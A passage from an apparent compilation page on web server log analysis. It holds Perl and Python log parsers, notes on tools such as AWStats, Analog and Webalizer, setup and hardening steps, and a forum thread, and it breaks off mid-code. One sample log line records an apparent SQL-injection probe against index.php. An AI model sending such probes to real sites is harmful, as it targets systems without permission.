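my @FIELDS = qw(host ident_user auth_user date time time_zone
                method url protocol status bytes referrer agent);

# Return a hash reference of named fields, or undef if the line does not parse.
sub parse_line {
    my ($line) = @_;
    my @values = $line =~ $LOG_RE or return;
    my %rec;
    @rec{@FIELDS} = @values;
    return \%rec;
}

# Usage: perl parse_both.pl access_log   (prints host, date, status, url)
if (@ARGV) {
    while (my $line = <>) {
        my $rec = parse_line($line) or next;
        print join("\t", @{$rec}{qw(host date status url)}), "\n";
    }
}
```

For Common Log Format lines the referrer and agent entries are simply undef.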

[Feb 07, 2012] how-to-start-writing-a-web-log-analyzer-in-perl

You could theoretically have as many text files as you want as command-line arguments, but so far I haven't gotten that part to work. I just have:
./logprocess.pl monster.log #monster.log is the file that contains entries 

Then, in the code:

#!/usr/bin/perl
use strict;
use warnings;

my @hashstuff;    # one hash reference per parsed log entry

# <> reads every file named on the command line in turn (or STDIN)
while (my $line = <>) {
    my ($ipaddy, $date, $time, $method, $url, $httpvers,
        $statuscode, $bytes, $referer, $useragent) = $line =~
        m#^(\d+\.\d+\.\d+\.\d+) \S+ \S+ \[(\d+/\S+/\d+):(\d+:\d+:\d+) \S+\] "(\S+) (\S+) (\S+)" (\d+) (\d+|-) "([^"]*)" "([^"]*)"#
        or next;    # skip lines that do not match
    push @hashstuff, {
        ipaddy => $ipaddy, date => $date, time => $time,
        method => $method, url => $url, httpvers => $httpvers,
        statuscode => $statuscode, bytes => $bytes,
        referer => $referer, useragent => $useragent,
    };
}

[Feb 07, 2012] ch21

Listing 21.1-21LST01.PL - Read the Access Log and Parse Each Entry
 

#!/usr/bin/perl -w

$LOGFILE = "access.log";
open(LOGFILE) or die("Could not open log file: $!");
foreach $line (<LOGFILE>) {
    ($site, $logName, $fullName, $date, $gmt,
         $req, $file, $proto, $status, $length) = split(' ',$line);
    $time = substr($date, 13);
    $date = substr($date, 1, 11);
    $req  = substr($req, 1);
    chop($gmt);
    chop($proto);
    # do line-by-line processing.
}
close(LOGFILE);
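The substr offsets in this listing are easy to misread. A small sketch that applies the same split, substr, and chop steps to one of the sample lines from this page and prints what each field ends up holding (parse_like_listing_21_1 is a hypothetical name). Note that split(' ') breaks the quoted request into three fields, which works only as long as the URL contains no spaces:

```perl
#!/usr/bin/perl
use strict;
use warnings;

# Apply Listing 21.1's split/substr/chop steps to one line and return the fields.
sub parse_like_listing_21_1 {
    my ($line) = @_;
    my ($site, $logName, $fullName, $date, $gmt,
        $req, $file, $proto, $status, $length) = split(' ', $line);
    my $time = substr($date, 13);       # skip "[16/Aug/2010:" (13 chars)
    $date    = substr($date, 1, 11);    # "16/Aug/2010"
    $req     = substr($req, 1);         # drop the opening double quote
    chop($gmt);                         # drop the closing "]"
    chop($proto);                       # drop the closing double quote
    return {
        site => $site, date => $date, time => $time, gmt => $gmt,
        req => $req, file => $file, proto => $proto,
        status => $status, length => $length,
    };
}

my $sample = q{194.146.226.69 - - [16/Aug/2010:12:28:52 -0600] "GET /index.php?pageid=' HTTP/1.1" 302 698 "-" "libwww-perl/5.834"};
my $fields = parse_like_listing_21_1($sample);
printf "%-7s %s\n", $_, $fields->{$_} for sort keys %$fields;
```

The fixed offsets rely on Apache writing two-digit days (for example 06/Aug/2010), which keeps the date part exactly 11 characters long.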

[Oct 10, 2011] w3perl

W3Perl 3.13 is a web logfile analyzer, but it can also read FTP, Squid, or mail logfiles. It can output most statistical data as both graphics and text. An administration interface is available to manage the package.

[Aug 5, 2001] Squid2MySQL

Squid2MySQL is an accounting system for squid. It includes monthly, daily, and timed detail levels, and uses MySQL for log storage.

Eugene V. Chernyshev <evc (at) chat (dot) ru>

[Mar 11, 2000] Log Rhythms

O'Reilly Network

In this column I'll give you a gentle introduction to Apache web server logs and their place in monitoring, security, marketing, and feedback.

stoic Freeware web server log analysis tool Jul 05th 1999, 05:52
stable: 1.2 - devel: none license: Freeware

Stoic is a small Perl script that examines Apache or Netscape web server access logs. Reports include logfile totals, domains visiting, top documents requested, browser agent statistics, platform statistics and a bunch of other stuff.

[May 26, 1999] Webalizer scoop - January 11th 1998, 20:47 EST

Download: ftp://ftp.mrunix.net/pub/webalizer/
Alternate Download: ftp://samhain.unix.cslab.tuwien.ac.at/webalizer/
Homepage: http://www.mrunix.net/webalizer/
Changelog: ftp://ftp.mrunix.net/pub/webalizer/CHANGES

The Webalizer is a web server log analysis program. It is designed to scan web server log files in various formats and produce usage statistics in HTML format for viewing through a browser. Very good output, good charts, and very fast. The only thing missing is a special mode for total statistics across all virtual web servers, without so many details.


httplogs

ktmatu's Log tools - Three of these: (from their page)

Relax - WWW logfile referring URL and search engine keyword analysis tool. This free Perl script recognizes many search engines and organizes popular keywords used to get to your site.
Lrdns - Log Reverse Domain Name System converts numeric IP addresses in access log files into textual domain names. Written in Perl.
Ffcat - Prints only the new entries in a log file. Fast forwards to the position where the last run ended, and then copies only the new lines of that file to the standard output. Written in Perl.

Parsing apache log files with Perl

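The following is a log analyzer written in Perl for Apache log files. Note that the log file path and the month analyzed (February 2002) are hard-coded in the script.

The following options can be given when invoking the script: -n <n> prints the top n accessed documents, -r shows referrers, -f shows which hosts requested each document, -t <n> limits the host and referrer lists to the top n entries, and -h prints a short help message.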

#!/usr/bin/perl -w

use strict;
use Getopt::Std;

open (LOG, "/var/log/httpd/adp-gmbh/xlf_log") or die "Cannot open log file: $!\n";

my $options = {};

# n how many urls?
# r print referers?
# f print from (which hosts)?
getopts("n:rfht:", $options);

my $methods = {};
my $urls    = {};

if ($options->{h}) {
  print "options:\n";  
  print "  -n <n>    print the top n visited urls\n";
  print "  -r        show referrers\n";
  print "  -f        show who has visited (f = from)\n";
  print "  -t <n>    show top <n> referrers and froms only\n";
  print "\n";
  exit;
}

my $ignoreHosts = {
  "xxx.yy.zzz.aaa" => {},
};

my $countGiven=0;
$countGiven = 1 if defined $options->{n};

while (my $line=<LOG>) {
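  my ($host,$date,$url_with_method,$status,$size,$referrer,$agent) = $line =~
          m/^(\S+) - - \[(\S+ [-+]\d{4})\] "(\S+ \S+ [^"]+)" (\d{3}) (\d+|-) "(.*?)" "([^"]+)"$/;

  # Print lines that do not parse and skip them before any field is used
  unless (defined $url_with_method) {
    print $line;
    next;
  }

  # Analyze only entries from February 2002
  next unless $date =~ m#\d{1,2}/Feb/2002#;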
  my ($method, $url, $http) = split /\s+/, $url_with_method;

  $url =~ s/\?(.*)//;
  $referrer=~ s/\?(.*)//;

  push @{$methods->{$method}}, $url;
  $urls->{$url} -> {host    } -> {$host}     ++;
  $urls->{$url} -> {count   }                ++;
  $urls->{$url} -> {referrer} -> {$referrer} ++;
} 

foreach my $m (keys %{$methods}) {
  print "$m : " . @{$methods->{$m}} . "\n";
}

my $nofUrls = 0;
foreach my $url (sort {$urls->{$b}->{count} <=> $urls->{$a}->{count} } keys %{$urls}) {

  printf "%5d %s\n\n", $urls->{$url}->{count}, $url;

  my @linesOut;

  if ($options->{f}) {
    my $currentLine=0;
    printf "  %6s%-35s"," ","hosts";
    foreach my $host (sort {$urls->{$url}->{host}->{$b} <=> $urls->{$url}->{host}->{$a} } keys %{$urls->{$url}->{host}}) {
      last if defined $options->{t} && $currentLine >= $options->{t};
      $linesOut[$currentLine] .= sprintf "  %5d %-35.35s" ,$urls->{$url}->{host}->{$host}, $host;
      $currentLine++;
    }
  }

  if ($options->{r}) {
    my $currentLine=0;
    printf "  %6s%-55s"," ","referrers";
    

    foreach my $referrer (sort {$urls->{$url}->{referrer}->{$b} <=> $urls->{$url}->{referrer}->{$a} } keys %{$urls->{$url}->{referrer}}) {
      last if defined $options->{t} && $currentLine >= $options->{t};
      $linesOut[$currentLine] .= sprintf "  %5d %-55.55s" ,$urls->{$url}->{referrer}->{$referrer}, $referrer;
      $currentLine++;
    }
  }
  print "\n";

  foreach my $line (@linesOut) {
    print "$line\n";
  }

  print "\n";
  $nofUrls++;
  if ($countGiven) {
    last if $nofUrls >= $options->{n};
  }
}

dailystats

What's so special about this program?

When we started out writing this program, people asked us "why write yet another statistics program for your weblog when there are dozens of them for free on the web including all possible reports and analyses?"

True, but we don't need a program that generates 12-page reports about everything that can possibly be found in the logs. We need to monitor, daily, a handful of important aspects and trends of our site's traffic, and we don't want them buried in pages and pages of other, mostly useless, information. We wanted a program that would show what we thought was important. So we made it, and we decided to also offer it for free here.

Perhaps you want to watch some figures that this program doesn't report. There are so many free web log analysis programs that we're sure you'll find a suitable one for your site. Otherwise, the trends that we watch with this program are pretty much the most essential and informative ones, and you should definitely have a program to investigate them.


Requirements

This program works with the plain or combined logs that the Apache web server generates. You might get IIS to generate a compatible log, but I won't get into that. Other than that, all you need is perl (and reliable webhosting) to run it.

Download

Click here to download dailystats-3.0.tgz.

Installation/Usage

There is a README file in the archive you just downloaded, explaining how to install it and run it.

Licence

Perlfect Daily Stats is freely distributed under the GNU General Public License.

How To Install, Secure, And Automate AWStats (CentOS-RHEL)

HowtoForge

Now that YUM has its additional repository, we are ready to install. From the command line, type:

yum install awstats

Modify AWStats Apache Configuration:

Edit /etc/httpd/conf.d/awstats.conf as shown below. Files placed in the /etc/httpd/conf.d/ folder are loaded automatically as part of the Apache configuration, so there is no need to include them again in httpd.conf. This layout is usually chosen for one of two reasons: it is cleaner, keeping each application in its own configuration file, or you are in a hosted environment that does not allow direct editing of httpd.conf:

Alias /awstats/icon/ /var/www/awstats/icon/

ScriptAlias /awstats/ /var/www/awstats/
<Directory /var/www/awstats/>
        DirectoryIndex awstats.pl
        Options ExecCGI
        AllowOverride AuthConfig
        order deny,allow
        allow from all
</Directory>

Alias /awstatsclasses "/var/www/awstats/lib/"
Alias /awstats-icon/ "/var/www/awstats/icon/"
Alias /awstatscss "/var/www/awstats/examples/css"

Note: the mod_cgi module of Apache must be loaded; otherwise Apache will not execute the script but will serve it as a plain file. CGI execution can be enabled in two ways: for the entire web server, or only for AWStats through a VirtualHost.

Edit the following lines in the default awstats configuration file /etc/awstats/awstats.localhost.localdomain.conf:

SiteDomain="<server name>.<domain>"
HostAliases="<any aliases for the server>"
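If you set up several servers, these two edits can be scripted. A minimal sketch that rewrites SiteDomain and HostAliases in place; it assumes each directive appears uncommented at the start of a line, and the script name set_awstats.pl and the example values are hypothetical:

```perl
#!/usr/bin/perl
use strict;
use warnings;

# Replace the value of each NAME="..." directive that starts a line;
# commented-out lines and directives not listed are left untouched.
sub set_directives {
    my ($text, %values) = @_;
    for my $name (keys %values) {
        my $v = $values{$name};
        $text =~ s/^\Q$name\E=.*/$name="$v"/mg;
    }
    return $text;
}

# Usage (hypothetical values):
#   perl set_awstats.pl /etc/awstats/awstats.localhost.localdomain.conf \
#        www.example.com "example.com localhost 127.0.0.1"
if (@ARGV == 3) {
    my ($file, $domain, $aliases) = @ARGV;
    open my $in, '<', $file or die "Cannot read $file: $!\n";
    my $text = do { local $/; <$in> };
    close $in;
    $text = set_directives($text, SiteDomain => $domain, HostAliases => $aliases);
    open my $out, '>', $file or die "Cannot write $file: $!\n";
    print {$out} $text;
    close $out or die "Cannot close $file: $!\n";
}
```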

Rename config file:

mv /etc/awstats/awstats.localhost.localdomain.conf /etc/awstats/awstats.<server name>.<domain>.conf

Update Statistics (Note: By default, statistics will be updated every hour.):

/usr/bin/awstats_updateall.pl now -confdir="/etc/awstats" -awstatsprog="/var/www/awstats/awstats.pl"

Start Apache:

/etc/init.d/httpd start

To automate startup of Apache on boot up, type

chkconfig httpd on

Verify Install

Go to http://<server name>.<domain>/awstats/awstats.pl?config=<server name>.<domain>

Securing AWStats

Setting File System Permissions

The webserver needs only read-access to your files in order for you to be able to access AWStats from the browser. Limiting your own permissions will keep you from accidentally messing with files. Just remember that with this setup you will have to run perl to execute scripts rather than executing the scripts themselves.

$ find ./awstats -type d -exec chmod 701 '{}' \;
$ find ./awstats -not -type d -exec chmod 404 '{}' \;
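For reference, the same permission scheme can be applied from Perl with the core File::Find module. A sketch, assuming you want exactly the behavior of the two find commands above (real directories get 701, everything else gets 404); lock_down and lock_down.pl are hypothetical names:

```perl
#!/usr/bin/perl
use strict;
use warnings;
use File::Find;

# Perl equivalent of:
#   find DIR -type d -exec chmod 701 '{}' \;
#   find DIR -not -type d -exec chmod 404 '{}' \;
# Returns how many directories and other entries were found.
sub lock_down {
    my ($dir) = @_;
    my (@dirs, @others);
    find({
        no_chdir => 1,
        wanted   => sub {
            # lstat first so a symlink to a directory counts as "not -type d"
            if (!-l $_ && -d _) { push @dirs, $File::Find::name }
            else                { push @others, $File::Find::name }
        },
    }, $dir);
    chmod 0404, @others;
    chmod 0701, @dirs;
    return (scalar @dirs, scalar @others);
}

# Usage: perl lock_down.pl ./awstats
lock_down($_) for @ARGV;
```

Permissions are changed only after the whole tree has been walked, so tightening a directory never interferes with the traversal.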

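Apache itself doesn't need direct access to the AWStats configuration files, so they can be locked down tightly. One caveat: when awstats.pl runs as a CGI script it executes as the Apache user and must be able to read its configuration file, so with mode 400 the files need to be owned by that user. To make the configuration files readable only by their owner: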

chmod 400 /etc/awstats/*.conf

Protecting The AWStats Directory With And Adding .htaccess

Securing the AWStats folder(s) is a multi-step process: make sure the awstats folder is owned by the user that needs access to it, create an htpasswd.users file, and add a corresponding .htaccess file that authenticates against it. First, secure the awstats folder by typing the following from the command line:

find ./awstats -type d -exec chmod 701 '{}' \;
find ./awstats -not -type d -exec chmod 404 '{}' \;

Now that our folders have been secured, we'll need to create the htpasswd.users file. Go to the /etc/awstats folder and execute the following command:

htpasswd -c /etc/awstats/htpasswd.users user

(Select whatever username you'd like.)

It will ask you for a password for the user you've selected; enter it and retype it for confirmation. The final step is to create an .htaccess file pointing to the htpasswd.users file for authentication. Go to /var/www/awstats/ and create a new file called .htaccess with your favorite editor (nano and vi tend to be the most popular). In this example we'll use vi. From the command line, type:

vi .htaccess

An alternate method of creating an .htaccess file is using the Htaccess Password Generator. Add the following content to your newly created .htaccess file:

AuthName "STOP - Do not continue unless you are authorized to view this site! - Server Access"
AuthType Basic
AuthUserFile /etc/awstats/htpasswd.users
Require valid-user

Once done, secure the .htaccess file by typing:

chmod 404 /var/www/awstats/.htaccess

[Mar 30,2006] Building and Using Analog on Solaris by Sandra Henry-Stocker

open.itworld.com

Analog is a free web traffic analysis tool that prepares reports on activity on your web sites, including graphs that summarize hourly and daily activity, file size, file type, visiting site, return codes, and numerous other statistics that illustrate how your web sites are being used. I recently compiled and deployed Analog on a couple of Solaris 9 servers. Today's column is a how-to on building Analog and a quick introduction to how it works.

To compile Analog on a Solaris system, you should first grab a copy of the source code. I went to http://www.analog.cx/download.html and downloaded analog-6.0.tar.gz. This command should work on the command line if you have wget installed:

wget http://www.analog.cx/analog-6.0.tar.gz

I then gunzipped and extracted the contents of the downloaded file and attempted to compile the application:

        $ gunzip analog-6.0.tar.gz
        $ tar xf analog-6.0.tar
        $ cd analog-6.0
        $ make

My attempt to compile Analog ran into some problems -- notably undefined symbols.

        $ make
        cd src && make
        make[1]: Entering directory `/export/home/henrystocker/analog-6.0/src'
        gcc            -O2      -DUNIX          -c alias.c
        gcc            -O2      -DUNIX          -c analog.c
        gcc            -O2      -DUNIX          -c cache.c
        ... omitted output ...
        Undefined                       first referenced
         symbol                             in file
        gethostbyaddr                       alias.o
        inet_addr                           alias.o
        ld: fatal: Symbol referencing errors. No output written to ../analog
        collect2: ld returned 1 exit status
        make[1]: *** [analog] Error 1
        make[1]: Leaving directory `/export/home/henrystocker/analog-6.0/src'
        make: *** [analog] Error 2

I soon figured out that I needed to make a small change to one of my Makefiles. I made the change with this perl command, adding the network services library after noting that the man pages for the undefined symbols both referenced -lnsl.
        $ cd src
        $ perl -i -p -e "s/LIBS = -lm/LIBS = -lnsl -lm/" Makefile

My LIBS line then looked like this: 

        LIBS = -lnsl -lm (added -lnsl)

After this change, Analog compiled without a hitch: 

        $ cd ..
        $ make
        cd src && make
        make[1]: Entering directory `/export/home/shs/analog-6.0/src'
        gcc            -O2      -DUNIX          -c alias.c
        gcc            -O2      -DUNIX          -c analog.c
        gcc            -O2      -DUNIX          -c cache.c
        ... omitted output ...
        gcc            -O2     -o ../analog alias.o analog.o cache.o dates.o
        globals.o hash.o init.o init2.o input.o macinput.o macstuff.o output.o
        output2.o outcro.o outhtml.o outlatex.o outplain.o outxhtml.o outxml.o
        process.o settings.o sort.o tree.o utils.o win32.o libgd/gd.o
        libgd/gd_io.o libgd/gd_io_file.o libgd/gd_png.o libgd/gdfontf.o
        libgd/gdfonts.o libgd/gdtables.o libpng/png.o libpng/pngerror.o
        libpng/pngmem.o libpng/pngset.o libpng/pngtrans.o libpng/pngwio.o
        libpng/pngwrite.o libpng/pngwtran.o libpng/pngwutil.o pcre/pcre.o
        zlib/adler32.o zlib/compress.o zlib/crc32.o zlib/deflate.o zlib/gzio.o
        zlib/infblock.o zlib/infcodes.o zlib/inffast.o zlib/inflate.o
        zlib/inftrees.o zlib/infutil.o zlib/trees.o zlib/uncompr.o zlib/zutil.o
        unzip/ioapi.o unzip/unzip.o bzip2/bzlib.o bzip2/blocksort.o
        bzip2/compress.o bzip2/crctable.o bzip2/decompress.o bzip2/huffman.o
        bzip2/randtable.o -lnsl -lm
        make[1]: Leaving directory `/export/home/shs/analog-6.0/src'

        $ ls -l analog
        -rwxr-xr-x   1 root     other     577568 Mar 29 19:34 analog
Once Analog was compiled, I moved it into /usr/local/bin (there was no "make install" option) and ran a "make clean" to remove object files. At this point, I had switched over to root.

The next step was setting up a configuration file to give Analog some directions on how I wanted it to work. Analog comes with example configuration files and there are numerous options that can be used to customize your reports, but I wanted to start with something simple, so I set up a handful of options and installed the file as /usr/local/bin/analog.cfg:

        # cat > /usr/local/bin/analog.cfg << EOF
        > LANGFILE usa.lng
        > HOSTNAME boson.particles.org
        > HOSTURL "http://boson.particles.org"
        > DAILYSUM ON
        > DAILYREP ON
        > LOGFILE /opt/apache/logs/access_log
        > OUTFILE /opt/apache/htdocs/webstats.html
        > DOMAINSFILE usdom.tab
        > EOF
I also had to create a directory named /usr/local/bin/lang and copy the usa.lng and usdom.tab files from my lang directory into it:
        # mkdir /usr/local/bin/lang
        # cp lang/usa.lng /usr/local/bin/lang
        # cp lang/usdom.tab /usr/local/bin/lang
I then ran the report like this:

# analog /opt/apache/logs/access_log

My processed report appeared in my /opt/apache/htdocs directory along with four image files containing pie charts for some of my statistics.

Here's a list of features that you can turn off or on: 
MONTHLY ON       # one line for each month
WEEKLY ON        # one line for each week
DAILYREP ON      # one line for each day
DAILYSUM ON      # one line for each day of the week
HOURLYREP ON     # one line for each hour of the day
GENERAL ON       # the General Summary at the top
REQUEST ON       # which files were requested
FAILURE ON       # which files were not found
DIRECTORY ON     # Directory Report
HOST ON          # which computers requested files
ORGANISATION ON  # which organisations they were from
DOMAIN ON        # which countries they were in
REFERRER ON      # where people followed links from
FAILREF ON       # where people followed broken links from
SEARCHQUERY ON   # the phrases and words they used...
SEARCHWORD ON    # ...to find you from search engines
BROWSERSUM ON    # which browser types people were using
OSREP ON         # and which operating systems
FILETYPE ON      # types of file requested
SIZE ON          # sizes of files requested
STATUS ON        # number of each type of success and failure
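
The DAILYREP and HOURLYREP reports boil down to counting requests by date and by hour of day. As a rough illustration (a minimal Python sketch, not Analog's implementation), the function below does that from the bracketed timestamp of Common Log Format lines. The name `daily_and_hourly` is hypothetical, and lines without a parsable timestamp are simply skipped.

```python
import re
from collections import Counter
from datetime import datetime

# Bracketed CLF timestamp, e.g. [29/Mar/2003:19:34:01 -0800]
TS_RE = re.compile(r"\[(\d{2}/\w{3}/\d{4}):(\d{2}):\d{2}:\d{2} [+-]\d{4}\]")


def daily_and_hourly(lines):
    """Return (requests per date, requests per hour of day)."""
    per_day = Counter()
    per_hour = Counter()
    for line in lines:
        m = TS_RE.search(line)
        if m is None:
            continue  # skip lines without a parsable timestamp
        # %b expects English month abbreviations (the default C locale)
        day = datetime.strptime(m.group(1), "%d/%b/%Y").date()
        per_day[day.isoformat()] += 1
        per_hour[int(m.group(2))] += 1
    return per_day, per_hour
```

Passing an open log file as `lines` works as well, since the function only iterates over it; note that the hour is taken from the server's local time as written in the log.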

Internet Access Monitor for Squid 2.4d - Monitoring of company's Internet access usage

Internet Access Monitor is a comprehensive Internet use monitoring and reporting utility for corporate networks. The program takes advantage of the fact that most corporations provide Internet access through proxy servers such as MS ISA Server, WinGate, WinRoute, MS Proxy, WinProxy, EServ, Squid, Proxy Plus and others. Each time a user accesses a website or downloads files or images, these actions are logged. Internet Access Monitor processes these log files to offer system administrators a wealth of report-building options. The program can build reports for individual users, showing the list of websites he or she visited along with a detailed breakdown of Internet activity (downloading, reading text, viewing pictures, watching movies, listening to music, working). The program can also create comprehensive reports analyzing overall bandwidth consumption, with easy-to-understand charts that point to the areas where wasteful bandwidth consumption may be eliminated.

A good and free Perl http log analysis script - awstats

There are a lot of free HTTP log file analysis tools out there that haven't been updated since the mid-90s; awstats, however, is both free and up to date. It looks a bit like WebTrends (though I haven't used WebTrends in several years). Here's an online demo. awstats can be used with several web servers, including IIS and Apache. You can either have it generate static HTML files or run it as a Perl script in the cgi-bin.

Here's a quick rundown of setting it up on Unix/Apache:

Each virtual web site you want to track stats for should have a file /etc/awstats.sitename.conf. The directives for the configuration file are documented at http://awstats.sourceforge.net/docs/awstats_config.html, and a default configuration file is provided in cgi-bin/awstats.model.conf, which you can use as a base.

Make sure your log files use the NCSA combined format. In Apache this is usually done with CustomLog /logs/access.log combined. You can use other formats, but then you have to customize the LogFormat setting in the conf file.
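
A quick way to check that a log really is in combined format before pointing AWStats at it is to try parsing a few lines: combined format is the common format plus quoted referrer and user-agent fields at the end. Below is a minimal Python sketch assuming Apache's standard `combined` LogFormat; `parse_combined` and `Hit` are hypothetical names, and the regex does not handle escaped quotes inside the request or user-agent strings.

```python
import re
from typing import NamedTuple, Optional

# host ident user [time] "request" status size "referrer" "user-agent"
COMBINED_RE = re.compile(
    r'(?P<host>\S+) (?P<ident>\S+) (?P<user>\S+) '
    r'\[(?P<time>[^\]]+)\] '
    r'"(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\d+|-) '
    r'"(?P<referrer>[^"]*)" "(?P<agent>[^"]*)"'
)


class Hit(NamedTuple):
    host: str
    time: str
    request: str
    status: int
    size: int
    referrer: str
    agent: str


def parse_combined(line: str) -> Optional[Hit]:
    """Return a Hit for a combined-format line, or None if it does not match."""
    m = COMBINED_RE.match(line)
    if m is None:
        return None
    size = 0 if m["size"] == "-" else int(m["size"])  # "-" means no body sent
    return Hit(m["host"], m["time"], m["request"], int(m["status"]),
               size, m["referrer"], m["agent"])
```

If most lines of a log come back as None, the log is probably in common (CLF) format and the AWStats LogFormat setting has to be adjusted accordingly.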

You will probably want to edit the LogFile directive to point to where your log file is stored, SiteDomain (the main domain for the site), HostAliases (other domains for the same site), and DirData, which specifies where the awstats databases are stored (each site gets its own file in that directory).

Once that is set up, you will want to update the database. This is done from the command line by running:

perl awstats.pl -config=sitename -update 

Now copy everything in the wwwroot folder to a web root and visit http://sitename.com/cgi-bin/awstats.pl. If you want to view other domains, use /cgi-bin/awstats.pl?config=othersitename

Here sitename (or othersitename) is the name used in the corresponding config file, awstats.sitename.conf.

If you want to generate static HTML files, run the awstats_buildstaticpages.pl script found in the tools folder. You have to give it the path to the awstats.pl script and a directory to put the static HTML files in:

perl awstats_buildstaticpages.pl -config=sitename -awstatsprog=/web/cgi-bin/awstats.pl \
  -dir=/web/stats/sitename/
More setup info can be found here: http://awstats.sourceforge.net/docs/index.html 

AWStats - Free log file analyzer for advanced statistics (GNU GPL).

Flexible and robust Perl-written web log analyser. Industrial strength! Highly recommended.

AWStats is a free, powerful and featureful tool that generates advanced web, FTP or mail server statistics, graphically. This log analyzer works as a CGI or from the command line and shows you all possible information your log contains, in a few graphical web pages. It uses a partial information file to be able to process large log files often and quickly. It can analyze log files from IIS (W3C log format), Apache (NCSA combined/XLF/ELF log format or common/CLF log format), WebStar and most other web, proxy, WAP and streaming servers, mail servers (and some FTP servers).
Take a look at this comparison table for an idea of the differences between the best-known statistics tools (AWStats, Analog, Webalizer, ...).
AWStats is free software distributed under the GNU General Public License. You can have a look at this license chart to see what you can and can't do.
As AWStats works from the command line but also as a CGI, it can work with most web hosting providers that allow CGI and log access.

You can browse the AWStats demo (the real-time feature to update stats from the web has been disabled on demos) to see a sample of the most important information AWStats shows you...

[Aug 29, 2000] Recommendations for log analysis software

I'm looking for access log analysis software that will run independently from the ACS. Hopefully the thing would read an AOLserver or Apache access log and generate some graphs and tables in a configurable way. Any specific suggestions? The goal is usage analysis for marketing purposes (i.e., not performance analysis). Probably running on Solaris and it doesn't have to be freeware.

-- S. Y., August 29, 2000

I've been using webalizer (http://www.webalizer.com). It's real easy to set up and configure. For a sample of what it does, check out http://www.badgertronics.com/reports
-- Mark Dalrymple, August 29, 2000

And if you don't mind paying, NetTracker (from http://www.sane.com) has a ton of reports, handles big log files (a site we know that's using it has 600 meg daily access logs), handles cobranding, etc
-- Mark Dalrymple, August 29, 2000

Nettracker rules! We've been using it for a couple of years now and everyone loves it. It has no knowledge of the ACS or its users, of course, so real clickstream tracking isn't really possible, but for basic log analysis with lots of information it's great.
-- Janine Sisk, August 29, 2000

I worked quite a while with NetAnalysis by the Boston-based company NetGen. It's database-backed log file analysis software, i.e. usually once per day you stuff your log file information into your db. This way you can keep track of your homepage's success over time. It also enables you to connect your webserver log information with information from other databases and come up with really powerful information. For example it has pretty damn good adaptors to Intershop and to Vignette StoryServer and you can implement your own adaptors with a Perl-based (soon to be Java) API. (Why do I know these adaptors are good? I made the one for Intershop work properly and I specified the one for my former company's Vignette StoryServer standard installation ;)

The software to run analysis on your log is very smartly configurable and you have good metrics and I was promised some really powerful metrics for a future release (that should be out as of now).

It runs on Solaris and you'll need Oracle and a pretty heavy machine (way bigger than your webserver usually).

Other products I know about are Accrue (used to be based on sniffing TCP/IP packets) and iDecide by Informix (has another name these days) that are db-backed as well. Oh, and then I once met with a Canadian company that use JavaScript to spy out some information about the client. It was probably the most expensive software regarding costs/line of code - tho they had very, very, very good metrics. You can head over to playboy.com and look for a JS call on their entry site ;)

regards Dirk
-- Dirk Gómez, August 30, 2000

I have had great success with 'analog' a free utility for log parsing and analysis. It can generate simple reports and also machine readable reports (good for DB backed summary generation). There is also a perl based package called 'Report Magic' which takes the machine readable output and makes pretty pictures and tables for you.

The problem with many log analysis tools is that they cannot be complete and definitely cannot reflect the structure of your particular site, especially if it has 'interesting' mechanisms by which content is rendered: frames, multiple URLs for a given page, etc. Also, when you get ~1GB of log data a day, some just croak big time. In this case, rolling your own is one solution, which I have been implementing (using Perl, where regexps are your friend, and a DB) and which follows some of the principles discussed at ASJ/. It also allows for simple reporting on only the bits 'n' pieces I feel are necessary, and it is quick with HUGE sets of data.

This is a good technique for allowing ad-hoc queries on data but make sure you have a reasonably hefty machine (Dual Xeon with 2GB RAM, 100GB RAID).

I guess if there is a package out there which is extensible and modular (plugin support as mentioned above) then that may also be quite useful.

It's important to define exactly what info is most important in analysing logs, else you can open up a huge can of worms, i.e. mapping all relationships between everything, which, whilst interesting, is quite difficult and reasonably useless unless it is quick and can add value in some way.

Sorry if I've stated the obvious, just my $0.05
-- geoff webb, September 4, 2000
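
The roll-your-own approach described above (regexps to parse, a database for ad-hoc queries) can be sketched in a few lines. This is a hypothetical Python illustration using the standard `sqlite3` module rather than Perl and a server database; the table layout and the function names `load_log` and `top_missing` are assumptions, and the example query lists the most frequently requested missing (404) URLs.

```python
import re
import sqlite3

# host ident user [time] "METHOD url PROTOCOL" status size
CLF_RE = re.compile(r'(\S+) \S+ \S+ \[([^\]]+)\] "(?:\S+) (\S+)[^"]*" (\d{3}) (\d+|-)')


def load_log(conn, lines):
    """Parse CLF lines into a 'hits' table; return the number of rows stored."""
    conn.execute("CREATE TABLE IF NOT EXISTS hits "
                 "(host TEXT, ts TEXT, url TEXT, status INTEGER, bytes INTEGER)")
    rows = []
    for line in lines:
        m = CLF_RE.match(line)
        if m:  # malformed requests (e.g. "-") are silently skipped
            host, ts, url, status, size = m.groups()
            rows.append((host, ts, url, int(status), 0 if size == "-" else int(size)))
    conn.executemany("INSERT INTO hits VALUES (?, ?, ?, ?, ?)", rows)
    conn.commit()
    return len(rows)


def top_missing(conn, limit=10):
    """Ad-hoc report: most requested URLs that returned 404."""
    return conn.execute(
        "SELECT url, COUNT(*) AS n FROM hits WHERE status = 404 "
        "GROUP BY url ORDER BY n DESC, url LIMIT ?", (limit,)).fetchall()
```

With real logs you would connect to a file-backed database (for example `sqlite3.connect("hits.db")`) and pass an open log file as `lines`; once the raw hits are in a table, a new report is just a new SQL query.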

Look carefully before you choose NetTracker. It scans the log files and saves the data into its own flat file database. If you ever lose files or decide that you want to add another report, it needs to regenerate all of that data. For a month's worth of logs (the 600 MB+ logs referred to by Mark Dalrymple above), it can take 3+ days.
-- Doug Harris, September 11, 2000

PAGE-STATS

page-stats.pl will examine the access log of an HTTP daemon and search it for occurrences of certain references. These references are then counted and put into an HTML file that is ready to be displayed to the outside world as a "Page Statistics" page. Each page can be selected from the statistics page.
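
The idea behind page-stats.pl, counting requests for a chosen set of pages and publishing the totals as an HTML page with links, can be sketched as follows. This is not page-stats.pl itself but a minimal Python illustration; `page_counts` and `render_html` are hypothetical names, query strings are ignored, and requests are counted regardless of status code.

```python
import html
import re
from collections import Counter

# URL path from the quoted request field, e.g. "GET /a.html HTTP/1.0"
REQ_RE = re.compile(r'"[A-Z]+ (\S+)[^"]*"')


def page_counts(lines, pages):
    """Count requests for each page in `pages` (pages never hit stay at 0)."""
    wanted = set(pages)
    counts = Counter({p: 0 for p in pages})
    for line in lines:
        m = REQ_RE.search(line)
        if m:
            path = m.group(1).split("?", 1)[0]  # ignore query strings
            if path in wanted:
                counts[path] += 1
    return counts


def render_html(counts):
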